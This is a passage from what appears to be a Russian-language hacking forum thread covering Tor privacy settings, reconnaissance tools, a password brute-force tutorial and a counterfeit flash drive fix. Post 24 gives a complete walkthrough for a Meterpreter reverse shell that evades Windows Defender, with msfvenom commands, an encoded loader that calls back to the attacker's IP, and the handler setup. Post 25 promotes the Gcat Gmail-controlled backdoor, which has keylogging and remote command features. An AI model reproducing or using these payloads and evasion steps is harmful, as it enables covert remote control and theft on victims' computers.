двойки на ноль. Выключение HTTP Referer Ищем такой параметр, как “network.http.sendSecureXsiteReferrer”, меняя его значение на False Теперь в поисковую строку вбиваем extensions.torbutton.saved.sendSecureXSiteReferrer, меняя его значение с единицы на двойку. Это основные настройки, которые помогут улучшить вашу анонимность в брауезере тор. Установив подобные изменения в софт, есть возможность, что некоторые сайты будут отказывать работать. Конечно, можно вернуть все к стандартным настройкам, но рекомендую не делать этого. Надеюсь вам это статья дала полезную информацию и ваши хакерские замыслы будут удачны. Но также не забывайте, статья только для ознакомления и вашей защиты от различных хакерских атак.
  20. WhatWeb необходим для идентификации сайтов. Главной задачей является определить всю необходимую информацию о ресурсы. Данная программа способна определить технологии сайта, какие системы управления содержанием пользуется, библиотеки JS, а также различные сервисы. Программа использует более 1500 различных скриптов и плагинов. Каждый плагин занимается своей собственной задачей. Сервис способен узнавать номера версий почты, учеток, модулей сайта, ошибок в БД и т.п. WhatWeb работает в двух вариациях, незаметно и быстро, либо старательно и медленно. Ресурс находится в золотой середине между качеством и надежностью выполнения работы. При входе на сайт через браузер, вы получите большое количество информации о технологиях, использующих сайт. Обычно при переходе на страницу собирается достаточное количество информации для его сканирования, но если не повезло, программа способна тщательнее проанализировать всю информацию. Самым быстрым уровнем работы является – stealthy, для его выполнения необходимо только один HTTP запрос сайта. Такой метод хорошо подходит для анализа общедоступных сайтов. Агрессивные методы сканирования, созданы для проникновения в сайт. Практически все плагины сервиса исчерпывающие и узнают все от а до я. Итак, благодаря огромному числу особенностей и функций WhatWeb становится незаменимой вещью в сканировании различных веб-ресурсов. С помощью него можно определить практически все технологии сайтов. WhatWeb создан под Kali Linux, подробнее можно ознакомиться можно в интернете, а также найти примеры использования и руководство по эксплуатации.
  21. Расскажу о различных сервисах сканирования, никаких предисловий, сразу к делу. VirusTotal Данный сервис проводит проверку файлов большим количеством антивирусов, сканеров и прочих служб выявляющих темную сторону проверяемого элемента. Абсолютно любой человек имеет право отправить файл на проверку в данный сервис, совершенно бесплатно. VirusTotal имеет несколько способов по отправлению файла, как стандартный метод с помощью веб-интерфейса, загрузкой на рабочий стол, а также расширение для браузера. IPVoid Ресурс является бесплатным, создан был в далеком 2010 году, позиционируя себя проверкой черных списков ИП адресов. Сканирование производится через несколько черных списков. Главной целью данного сервиса является предоставление доступных инструментов, помогающих наладить сетевые неполадки и помочь собрать необходимые данные о ИП адресах. URLVoid Подобно прошлому ресурсу, данный проект был создан в 2010 году для сканирования различных сайтов, прогоняя их через различные рейтинги и механизмы определения репутации, также черных-списков и доменов. Это необходимо чтобы определить потенциально опасный сайт, распространяющий вредоносные программы, либо управляемый мошенниками. Web Inspector Данная служба предназначена для проверки безопасности сайтов. Поможет удалить вирусы и защитит сайт от атак хакеров. URL Query Сервис помогает найти и проанализировать вирусные программы. С помощью данной службы можно получить все данные о работе в браузере, посещении сайтов, а также предоставить развернутую информация для будущего сканирования. Central Ops Сборник нескольких служб, которые могут просканировать различные домены и ИП-адреса и прочие интересные данные, например данные о владельце сайта, DND-сервера и т. д. Network Tools Данный сайт дает возможность обычному пользователю воспользоваться разнообразными методами сканирования, такими как Whois, Ping, сканирование заголовков http, декодирование адресов и т. д. Shodan Данный сервис является некой поисковой системой, с помощью который возможно осуществить поиск различных видов компьютеров, таких как роутеры, сервера и т. д. Можно найти описание данного ресурса как поисков сервисных баннеров, представляющее метаданные, которые получается клиент назад. Узнать можно о ПО различных серверов, поддерживаемые опции, различные сообщения и многие другие фишки, которые присутствуют на сервере.
  22. Привет ребята, хочу рассказать вам о простом коде, который можно использовать для перебора рандомных созданных паролей, для взлома. Конечно, для демонстрации взламывать мы будем свой пароль, который мы введем, потому что этот код не предназначен быть скриптом для брута, это лишь небольшое пособие новичкам в программирование, чтобы они уяснили, как работают подобные скрипты. Первым делом необходимо определиться с языком программирования. Думаю из названия статьи вы уже поняли, что использоваться будет язык Python, он легок в понимании и приятен глазу. С помощью питона будет легко показать, как происходит перебор паролей. Думаю стоит закончит предисловие и прейти к делу. Первым делом нам нужно импортировать модули, понадобиться только модуль random. Ипортируем: Теперь необходимо определить переменные, всего их будет 6 Это все переменные необходимые для работы скрипта. Далее мы создаем цикл. В цикле будет выполнятся вся работе. Также добавим данную строчку для того, чтобы обнуляться переменную password. Теперь нас ждет самое интересное – генерация и перебор паролей. Для начала создаем цикл for, чтобы генерировать пароли. Тут понадобится переменная length Теперь создаем код, с помощью которого можно будет узнать, был ли ранее сгенерирован тот или иной пароль, а также проверить идентичен ли он. Собственно это все, нет ничего сложного. Я надеюсь, что данная небольшая статья помогла кому-то разобраться в этих тонкостях. Возможно даже вы когда-нибудь станете хакером.
  23. Возможно не многие знают, но последнее время очень часто бывают случаи, когда недобросовестные компании, которые за очень мелкие деньги могут предоставить вам большой выбор высокообъемных flash накопителей. Чаще всего такие компании существуют в Китае, но это не важно. Чаще всего получается так, что на флешке намного меньше емкости чем было заявлено производителем, не смотря на то, что в свойствах накопителя мы видим заветные цифры. В данной статье я расскажу о том, как узнать настоящую емкость флешки. Почему так выходит и как узнать реальную емкость накопителя На самом деле китайские предприниматели делают очень хитро, они прошивают контроллер памяти таким образом, что компьютер будет его определять как более емкое, хотя это на самом деле не так. Есть такая маленькая программа, которая называется – h2testw. Она позволит вам протестировать ваш накопитель, чтобы узнать какую емкость он имеет на самом деле. Скачать данную программу можно по ссылке - https://www.heise.de/download/product/h2testw-50539 После установки программы запускам ее. При первом старте будет установлен немецкий язык, поэтому чтобы упросить работу выбираем английский. Далее необходимо выбрать накопитель. Для этого нажимаем на кнопку “Select target” Выбираем требуемый накопитель. Обратите внимание, что во время проверки емкость флешки вся информация хранящаяся на ней будет очищена. Для начала работы программы нажимаем “Write + verify” Проверка выглядит следующим образом, вся емкость флешки поэтапно наполняется файлами формата H2W, каждый из которых имеет объем в 1 гигабат. На это тратится достаточно большое количество времени, от емкости накопителя будет влиять скорость, обычно от 3 часов и более. Текст отмеченный красным и является настоящей емкостью накопителя. Как сделать чтобы накопитель показывал настоящую емкость Если вы хотите и дальше пользоваться такими устройствами, то вы можете сделать так, чтобы флешка показывала реальный объем. Для этого необходимо провести настройку контроллера, делается это с помощью программы MyDiskFix Скачать данную программу можно по ссылке - https://mega.nz/#!MrgUBAjI!0acagwJcqYeTE0SD5JK4X6NZqnQGb4WMVLBvxXCYRog Теперь нужно запустить программу, делать это обязательно с правами администратора. Не пугайтесь непонятных символов, программа китайская (как иронично). Поэтому следуем моим инструкциям и проблем не возникнет. Сначала необходимо выбрать накопитель. Как в случае с предыдущей программой все данные будут удалены. Далее нам нужно выбрать один из левых пунктов, а именно низкоуровневое форматирование. Справа нам нужно вписать количество секторов накопителя, их количество вы можете узнать в прошлой программе, они обозначены в скобках. Здесь нельзя ошибиться, будьте очень внимательны, ведь если сделать что-то не так, накопитель может выйти из строя. Далее там же нажимаем на кнопку. Потом подтверждаем предупреждение и начинаем процесс. Далее просто проводим форматирование флешки. Когда вы закончите все пункты, вы сможете использовать накопитель. Хотелось бы сказать о том, что дешевые флешки не дадут нам хорошего качества, выбирайте с умом.
  24. Всем привет. Сегодня рассмотрим вариант запуска meterpreter сессии на машине Windows 10 с самыми свежими патчами (включая Windows Defender). И все также будем обходить антивирусы. Meterpreter — расширенная многофункциональная начинка (payload, нагрузка), которая может быть динамически расширена во время выполнения. В нормальных условиях это обеспечивает вас основной оболочкой и позволяет вам добавлять новые особенности к ней по мере необходимости. Будем мы это делать с помощью Python, и посмотрим, как поведут себя антивирусные средства. Предугадывая вопрос «А нужен ли нам Python на машине жертвы для запуска ехе?», отвечу сразу – нет, не нужен, все уже внутри. В данной статье мы будем использовать: Windows 10 с включенным Windows Defender с обновленными базами (компьютер жертвы 192.168.1.113);Kali linux для использования metasploit и msfvenom (192.168.1.126); Windows 10 для сборки бинарника (в нашей лаборатории совпадает с компьютером жертвы) с установленными; Python (3, но и для 2 тоже посмотрим);py2exe.Для начала обозначим проблему: создадим exe файл со стандартной нагрузкой, скопируем на машину жертвы и посмотрим к чему это приведёт. msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.126 LPORT=9001 -f exe > hunt.exe Мы получаем предупреждение от нашего старого друга Windows Defender, которого мы так все любим. Давайте запустим Python и сделаем то, ради чего мы все тут собрались. Python/meterpreter/reverse_tcp – это уникальный кроссплатформенный payload Metasploit Framework, который позволяет удаленно управлять скомпрометированным компьютером. Не нужно думать о том, какую платформу выбрать, он сработает на любой, но в данном случае сделаем из него исполняемый файл под Windows. Для начала установим пакет py2exe, который позволяет сделать исполняемый файл Windows из Python скрипта. У нас это будет Python 3.4 (все что выше – не поддерживает py2exe). py -3.4 –m pip install py2exe или pip install py2exe Далее создадим «сырой» питоновский код с расширением .py msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.1.126 LPORT=9001 -f raw > hunt.py Так же в вывод msfvenom нам необходимо добавить импорт getpass, который он забывает сделать сам. В итоге получиться должно так: import getpass,base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzE5Mi4xNjguMS4xMjYnLDkwMDEpKQoJCWJyZWFrCglleGNlcHQ6CgkJdGltZS5zbGVlcCg1KQpsPXN0cnVjdC51bnBhY2soJz5JJyxzLnJlY3YoNCkpWzBdCmQ9cy5yZWN2KGwpCndoaWxlIGxlbihkKTxsOgoJZCs9cy5yZWN2KGwtbGVuKGQpKQpleGVjKGQseydzJzpzfSkK'))) Теперь у нас все готово для создания бинарника. python34 -m py2exe.build_exe hunt.py --bundle-files 0 Уже лучше, теперь проверим это в действии – после копирования на машину жертвы обходимся без алертов. Параллельно запустим наш msf и handler для питона, запустив последовательно команды: msfconsole use exploit/multi/handler set PAYLOAD python/meterpreter/reverse_tcp set lhost 192.168.1.126 set lport 9001 run Пойдем дальше и убедимся, что сессия работает корректно. Таким образом сессия запущена и Windows Defender не сработал, чего мы и добивались. Заодно давайте рассмотрим, что делать, если у вас Python 2ой версии. Качаем py2exe для python 2 Генерируем payload с расширением .py Создаем файл setup.py и пишем туда следующее: from distutils.core import setup import py2exe setup( name = ‘Meter’, description = ‘Python-based App’, version = ‘1.0’, console=[‘hunt.py’], options = {‘py2exe’: {‘bundle_files’: 1,’packages’:’ctypes’,’includes’: ‘base64,sys,socket,struct,time,code,platform,getpass,shutil’,}}, zipfile = None, ) python.exe .\setup.py py2exeДолжно получиться все то же самое. В качестве итога замечу, что оболочка python meterpreter уступает по функционалу более привычному windows meterpreter. Например, не получится мигрировать в процесс или использовать команды типа getsystem, но все же это реальная альтернатива: получить сессию для работы с msf (routing и portfwd как минимум) и далее работать внутри сети.
  25. Всем привет, в этой статье я хочу вам показать один из бесплатных троянов, который написан на питоне, а именно о Gcat. Gcat является скрытным бэкдором написанным соответственно на питоне. Он использует почтовый сервис Gmail, для так называемого command and control сервера. Чтобы данный троян мог работать, ему понадобится почта на данном сервиса, вместе с включенной функцией Allow less secure apps, которую можно включать в настройках вашей учетной записи. Данный нам репозиторий содержит в себе всего лишь 2 файла: Gcat.py – сам скрипт, который перечисляет все доступные клиенты и передает им командыImplant.py – является самим бэкдоромЧтобы все заработало, нужно изменить всего лишь две переменные, а именно: gmail_user, gmail_pwd. Итак, клиент предоставляем нам обширные возможности, можно выполнить такие команды: Выполнение команд, удаленное скачивание файлов у жертвы, после отправки шелл кода его можно выполнить, скачать скрин экрана, отключить экран жертвы, запустить и отключить кейлогер. Вот так выглядит запуск различных команд в клиенте: # python gcat.py-id 90b2cd83-cb36-52de-84ee-99db6ff41a11-cmd ‘ipconfig /all’ [*] Command sent successfully with jobid: SH3C4gv После чего запрашиваем результат для определенного Id и JobId: # python gcat.py-id 90b2cd83-cb36-52de-84ee-99db6ff41a11-jobid SH3C4gv DATE: ‘Tue, 09 Jun 2015 06:51:44 -0700 (PDT)’ JOBID: SH3C4gv FG WINDOW: ‘Command Prompt - C:Python27python.exe implant.py’ CMD: ‘ipconfig /all’ Если будет нехватка чего-либо, то это легко исправить, просто дописав необходимые компоненты. Ссылка для скачивания репозитория: github.com/byt3bl33d3r/gcat Данный троян можно запустить на таких операционных системах как Windows и различные Unix-подобные системы.
×
×
  • Create New...

Important Information

Guidelines
Terms of Use
We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.